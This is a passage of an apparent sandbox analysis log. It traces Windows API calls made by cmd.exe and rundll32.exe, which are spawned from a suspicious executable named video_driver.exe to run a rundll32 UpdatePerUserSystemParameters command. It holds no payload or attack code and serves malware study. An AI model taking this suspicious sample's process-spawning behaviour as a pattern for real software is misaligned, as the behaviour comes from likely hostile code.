8 [0042.664] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0042.664] GetProcessHeap () returned 0xf0000 [0042.664] HeapFree (in: hHeap=0xf0000, dwFlags=0x0, lpMem=0x104158 | out: hHeap=0xf0000) returned 1 [0042.664] GetEnvironmentStringsW () returned 0x104158* [0042.664] GetProcessHeap () returned 0xf0000 [0042.664] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0xb5c) returned 0x109620 [0042.664] FreeEnvironmentStringsW (penv=0x104158) returned 1 [0042.664] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0042.664] GetProcessHeap () returned 0xf0000 [0042.664] HeapFree (in: hHeap=0xf0000, dwFlags=0x0, lpMem=0x109620 | out: hHeap=0xf0000) returned 1 [0042.664] GetEnvironmentStringsW () returned 0x104158* [0042.664] GetProcessHeap () returned 0xf0000 [0042.664] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0xb5c) returned 0x109620 [0042.664] FreeEnvironmentStringsW (penv=0x104158) returned 1 [0042.664] GetProcessHeap () returned 0xf0000 [0042.664] HeapFree (in: hHeap=0xf0000, dwFlags=0x0, lpMem=0xfff98 | out: hHeap=0xf0000) returned 1 [0042.664] DeleteProcThreadAttributeList (in: lpAttributeList=0x37f58c | out: lpAttributeList=0x37f58c) [0042.664] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.664] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0042.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.665] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aba41ac | out: lpMode=0x4aba41ac) returned 1 [0042.665] _get_osfhandle (_FileHandle=0) returned 0x3 [0042.665] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aba41b0 | out: lpMode=0x4aba41b0) returned 1 [0042.665] SetConsoleInputExeNameW () returned 0x1 [0042.665] GetConsoleOutputCP () returned 0x1b5 [0042.665] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aba4260 | out: lpCPInfo=0x4aba4260) returned 1 [0042.665] SetThreadUILanguage (LangId=0x0) returned 0x409 [0042.665] exit (_Code=0) Process: id = "14" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x4616d000" os_pid = "0x6c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x484" cmd_line = "RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 14 os_tid = 0x738 Process: id = "15" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x472b2000" os_pid = "0x754" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0x688 [0042.737] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39f82c | out: lpSystemTimeAsFileTime=0x39f82c*(dwLowDateTime=0xffc6bec0, dwHighDateTime=0x1d623ff)) [0042.737] GetCurrentProcessId () returned 0x754 [0042.737] GetCurrentThreadId () returned 0x688 [0042.737] GetTickCount () returned 0x1145bb7 [0042.737] QueryPerformanceCounter (in: lpPerformanceCount=0x39f824 | out: lpPerformanceCount=0x39f824*=16287075291) returned 1 [0042.738] GetModuleHandleA (lpModuleName=0x0) returned 0x4a890000 [0042.739] __set_app_type (_Type=0x1) [0042.739] __p__fmode () returned 0x770331f4 [0042.739] __p__commode () returned 0x770331fc [0042.739] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8b21a6) returned 0x0 [0042.739] __getmainargs (in: _Argc=0x4a8b4238, _Argv=0x4a8b4240, _Env=0x4a8b423c, _DoWildCard=0, _StartInfo=0x4a8b4140 | out: _Argc=0x4a8b4238, _Argv=0x4a8b4240, _Env=0x4a8b423c) returned 0 [0042.739] GetCurrentThreadId () returned 0x688 [0042.739] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x688) returned 0x60 [0042.739] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.740] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0042.740] SetThreadUILanguage (LangId=0x0) returned 0x409 [0042.740] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0042.740] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x39f7bc | out: phkResult=0x39f7bc*=0x0) returned 0x2 [0042.740] VirtualQuery (in: lpAddress=0x39f7f3, lpBuffer=0x39f78c, dwLength=0x1c | out: lpBuffer=0x39f78c*(BaseAddress=0x39f000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0042.740] VirtualQuery (in: lpAddress=0x2a0000, lpBuffer=0x39f78c, dwLength=0x1c | out: lpBuffer=0x39f78c*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0042.740] VirtualQuery (in: lpAddress=0x2a1000, lpBuffer=0x39f78c, dwLength=0x1c | out: lpBuffer=0x39f78c*(BaseAddress=0x2a1000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0042.740] VirtualQuery (in: lpAddress=0x2a3000, lpBuffer=0x39f78c, dwLength=0x1c | out: lpBuffer=0x39f78c*(BaseAddress=0x2a3000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0042.740] VirtualQuery (in: lpAddress=0x3a0000, lpBuffer=0x39f78c, dwLength=0x1c | out: lpBuffer=0x39f78c*(BaseAddress=0x3a0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0042.741] GetConsoleOutputCP () returned 0x1b5 [0042.741] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8b4260 | out: lpCPInfo=0x4a8b4260) returned 1 [0042.741] SetConsoleCtrlHandler (HandlerRoutine=0x4a8ae72a, Add=1) returned 1 [0042.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.741] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0042.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.741] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8b41ac | out: lpMode=0x4a8b41ac) returned 1 [0042.742] _get_osfhandle (_FileHandle=1) returned 0x7 [0042.742] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0042.742] _get_osfhandle (_FileHandle=0) returned 0x3 [0042.742] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8b41b0 | out: lpMode=0x4a8b41b0) returned 1 [0042.742] GetEnvironmentStringsW () returned 0x3e20d0* [0042.742] GetProcessHeap () returned 0x3d0000 [0042.742] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xaca) returned 0x3e2ba8 [0042.743] FreeEnvironmentStringsW (penv=0x3e20d0) returned 1 [0042.743] GetProcessHeap () returned 0x3d0000 [0042.743] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4) returned 0x3e1870 [0042.743] GetEnvironmentStringsW () returned 0x3e20d0* [0042.743] GetProcessHeap () returned 0x3d0000 [0042.743] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xaca) returned 0x3e3680 [0042.743] FreeEnvironmentStringsW (penv=0x3e20d0) returned 1 [0042.743] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e72c | out: phkResult=0x39e72c*=0x68) returned 0x0 [0042.743] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x0, lpData=0x39e738*=0x0, lpcbData=0x39e730*=0x1000) returned 0x2 [0042.743] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x4, lpData=0x39e738*=0x1, lpcbData=0x39e730*=0x4) returned 0x0 [0042.744] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x0, lpData=0x39e738*=0x1, lpcbData=0x39e730*=0x1000) returned 0x2 [0042.744] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x4, lpData=0x39e738*=0x0, lpcbData=0x39e730*=0x4) returned 0x0 [0042.744] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x4, lpData=0x39e738*=0x40, lpcbData=0x39e730*=0x4) returned 0x0 [0042.744] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x4, lpData=0x39e738*=0x40, lpcbData=0x39e730*=0x4) returned 0x0 [0042.744] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x0, lpData=0x39e738*=0x40, lpcbData=0x39e730*=0x1000) returned 0x2 [0042.744] RegCloseKey (hKey=0x68) returned 0x0 [0042.744] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e72c | out: phkResult=0x39e72c*=0x68) returned 0x0 [0042.744] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x0, lpData=0x39e738*=0x40, lpcbData=0x39e730*=0x1000) returned 0x2 [0042.744] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x4, lpData=0x39e738*=0x1, lpcbData=0x39e730*=0x4) returned 0x0 [0042.744] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x0, lpData=0x39e738*=0x1, lpcbData=0x39e730*=0x1000) returned 0x2 [0042.744] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x4, lpData=0x39e738*=0x0, lpcbData=0x39e730*=0x4) returned 0x0 [0042.744] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x4, lpData=0x39e738*=0x9, lpcbData=0x39e730*=0x4) returned 0x0 [0042.744] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x4, lpData=0x39e738*=0x9, lpcbData=0x39e730*=0x4) returned 0x0 [0042.745] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e734, lpData=0x39e738, lpcbData=0x39e730*=0x1000 | out: lpType=0x39e734*=0x0, lpData=0x39e738*=0x9, lpcbData=0x39e730*=0x1000) returned 0x2 [0042.745] RegCloseKey (hKey=0x68) returned 0x0 [0042.745] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b62 [0042.745] srand (_Seed=0x5eb34b62) [0042.745] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" [0042.745] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" [0042.745] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8b5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0042.745] GetProcessHeap () returned 0x3d0000 [0042.745] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x210) returned 0x3e20d0 [0042.745] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e20d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0042.745] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0042.746] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.746] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0042.746] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0042.746] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0042.746] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0042.746] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0042.746] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0042.746] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0042.746] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0042.746] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0042.746] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0042.746] GetProcessHeap () returned 0x3d0000 [0042.746] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e2ba8 | out: hHeap=0x3d0000) returned 1 [0042.746] GetEnvironmentStringsW () returned 0x3e22e8* [0042.746] GetProcessHeap () returned 0x3d0000 [0042.746] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xae2) returned 0x3e4c48 [0042.747] FreeEnvironmentStringsW (penv=0x3e22e8) returned 1 [0042.747] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0042.747] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0042.747] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0042.747] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0042.747] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0042.747] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0042.747] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0042.747] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0042.747] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0042.747] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0042.747] GetProcessHeap () returned 0x3d0000 [0042.747] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x54) returned 0x3e17a0 [0042.747] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x39f4f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0042.747] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x39f4f8, lpFilePart=0x39f4f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39f4f4*="Desktop") returned 0x25 [0042.747] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0042.747] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x39f274 | out: lpFindFileData=0x39f274*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3e5738 [0042.748] FindClose (in: hFindFile=0x3e5738 | out: hFindFile=0x3e5738) returned 1 [0042.748] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x39f274 | out: lpFindFileData=0x39f274*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfe3b9a80, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xfe3b9a80, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3e5738 [0042.748] FindClose (in: hFindFile=0x3e5738 | out: hFindFile=0x3e5738) returned 1 [0042.748] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0042.748] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x39f274 | out: lpFindFileData=0x39f274*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3e5738 [0042.748] FindClose (in: hFindFile=0x3e5738 | out: hFindFile=0x3e5738) returned 1 [0042.748] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0042.748] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0042.748] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0042.748] GetProcessHeap () returned 0x3d0000 [0042.748] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e4c48 | out: hHeap=0x3d0000) returned 1 [0042.748] GetEnvironmentStringsW () returned 0x3e4158* [0042.749] GetProcessHeap () returned 0x3d0000 [0042.749] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb36) returned 0x3e5f78 [0042.749] FreeEnvironmentStringsW (penv=0x3e4158) returned 1 [0042.749] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8b5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0042.749] GetProcessHeap () returned 0x3d0000 [0042.749] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e17a0 | out: hHeap=0x3d0000) returned 1 [0042.749] GetProcessHeap () returned 0x3d0000 [0042.749] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400e) returned 0x3e6ab8 [0042.749] GetProcessHeap () returned 0x3d0000 [0042.749] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x88) returned 0x3e2e28 [0042.750] GetProcessHeap () returned 0x3d0000 [0042.750] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e6ab8 | out: hHeap=0x3d0000) returned 1 [0042.750] GetConsoleOutputCP () returned 0x1b5 [0042.750] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8b4260 | out: lpCPInfo=0x4a8b4260) returned 1 [0042.750] GetUserDefaultLCID () returned 0x409 [0042.750] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a8b4950, cchData=8 | out: lpLCData=":") returned 2 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x39f638, cchData=128 | out: lpLCData="0") returned 2 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x39f638, cchData=128 | out: lpLCData="0") returned 2 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x39f638, cchData=128 | out: lpLCData="1") returned 2 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a8b4940, cchData=8 | out: lpLCData="/") returned 2 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a8b4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a8b4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a8b4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a8b4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a8b4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a8b4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a8b4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a8b4930, cchData=8 | out: lpLCData=".") returned 2 [0042.751] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a8b4920, cchData=8 | out: lpLCData=",") returned 2 [0042.751] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0042.752] GetProcessHeap () returned 0x3d0000 [0042.752] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x20c) returned 0x3e2eb8 [0042.753] GetConsoleTitleW (in: lpConsoleTitle=0x3e2eb8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0042.753] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.753] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0042.753] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0042.753] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0042.753] GetProcessHeap () returned 0x3d0000 [0042.753] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400a) returned 0x3e6ab8 [0042.753] GetProcessHeap () returned 0x3d0000 [0042.753] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e6ab8 | out: hHeap=0x3d0000) returned 1 [0042.755] _wcsicmp (_String1="RUNDLL32.EXE", _String2=")") returned 73 [0042.755] _wcsicmp (_String1="FOR", _String2="RUNDLL32.EXE") returned -12 [0042.755] _wcsicmp (_String1="FOR/?", _String2="RUNDLL32.EXE") returned -12 [0042.755] _wcsicmp (_String1="IF", _String2="RUNDLL32.EXE") returned -9 [0042.755] _wcsicmp (_String1="IF/?", _String2="RUNDLL32.EXE") returned -9 [0042.755] _wcsicmp (_String1="REM", _String2="RUNDLL32.EXE") returned -16 [0042.755] _wcsicmp (_String1="REM/?", _String2="RUNDLL32.EXE") returned -16 [0042.755] GetProcessHeap () returned 0x3d0000 [0042.755] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e30d0 [0042.755] GetProcessHeap () returned 0x3d0000 [0042.755] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x22) returned 0x3e17d8 [0042.756] GetProcessHeap () returned 0x3d0000 [0042.757] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x6c) returned 0x3e3130 [0042.757] GetConsoleTitleW (in: lpConsoleTitle=0x39f330, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0042.758] GetFileAttributesW (lpFileName="RUNDLL32.EXE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rundll32.exe")) returned 0xffffffff [0042.758] _wcsicmp (_String1="RUNDLL32", _String2="DIR") returned 14 [0042.758] _wcsicmp (_String1="RUNDLL32", _String2="ERASE") returned 13 [0042.758] _wcsicmp (_String1="RUNDLL32", _String2="DEL") returned 14 [0042.758] _wcsicmp (_String1="RUNDLL32", _String2="TYPE") returned -2 [0042.758] _wcsicmp (_String1="RUNDLL32", _String2="COPY") returned 15 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="CD") returned 15 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="CHDIR") returned 15 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="RENAME") returned 16 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="REN") returned 16 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="ECHO") returned 13 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="SET") returned -1 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="PAUSE") returned 2 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="DATE") returned 14 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="TIME") returned -2 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="PROMPT") returned 2 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="MD") returned 5 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="MKDIR") returned 5 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="RD") returned 17 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="RMDIR") returned 8 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="PATH") returned 2 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="GOTO") returned 11 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="SHIFT") returned -1 